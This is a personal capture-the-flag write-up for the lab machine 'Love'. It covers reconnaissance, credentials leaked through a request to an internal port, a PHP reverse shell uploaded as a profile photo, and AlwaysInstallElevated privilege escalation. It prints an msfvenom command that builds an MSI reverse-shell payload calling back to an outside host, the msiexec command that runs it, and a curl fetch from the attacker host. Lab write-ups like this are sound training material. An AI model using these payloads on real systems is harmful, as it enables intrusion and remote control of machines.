Love - Writeup - Konstantinovitz

## Recon - wapp - 80 - - mariadb - 3306 (not allowed to connect to this server) - web server - 5000 - OS: Windows 10 Pro 19042 ### SMB - 445 - null bind - allowed - null shares - denied - guest account - disabled - potentially vulnerable to SMBGhost (CVE-2020-0796) - spooler service enabled ## Pan-sub - 7680 - no love - can connect using `nc -nv $RHOST 7680` - no gobuster ### HTTP - 5000 - 403 Not allowed ### staging.love.htb http://staging.love.htb/ ![[Pasted image 20250221121517.png]] ## Initial Access Navigate to http://staging.love.htb and input `127.0.0.1:5000` ![[Pasted image 20250221121543.png]] and we'll get some credentials: ![[Pasted image 20250219231618.png]] `admin:@LoveIsInTheAir!!!!` These credentials may be leveraged to authenticate with the previously inaccessible voting admin panel at: http://love.htb/admin/. In order to gain a reverse shell we'll go ahead and edit the user profile in the top right corner and "update the photo" with a `.php` reverse shell: ![[Pasted image 20250221125627.png]] The reverse shell will automatically trigger upon page reload. ## Privesc - Potential database credentials? - Practice the port forwarding and see if you can access mysql from your local system - There's azure tokens stored?? ### Sensitive Files: ``` cat C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt curl 10.10.14.9:8000/dControl.zip -o dControl.zip ``` Let's attempt to locate the file in question: ```powershell Get-ChildItem -Path C:\ -Filter "dControl.zip" -Recurse -ErrorAction SilentlyContinue ``` Yields nothing? Attempting to ping the remote host also yields nothing? ```powershell Test-NetConnection -RemoteAddress 10.10.14.9 WARNING: Ping to 10.10.14.9 failed with status: TimedOut ``` Better inspection of the winpeas output reveals: ``` ╔══════════╣ Checking AlwaysInstallElevated ╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated AlwaysInstallElevated set to 1 in HKLM! AlwaysInstallElevated set to 1 in HKCU! ``` Refer to my [[Windows Privesc - Registry Misconfigurations]] Generating a `.MSI` payload: ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=9000 -f msi -o shell.msi ``` Upload the payload and execute it: ```sh msiexec /q /i shell.msi ``` ## Lessons - Got stuck in a rabbit hole with the powershell history file for too long - Was reading through the winpeas output too quickly and completely missed the totally obvious privesc vector.... - Had to get help to figure out the initial access vector, missed the `staging.love.htb` subdomain in my enumeration and had no idea that I could have set it up using `/etc/hosts`...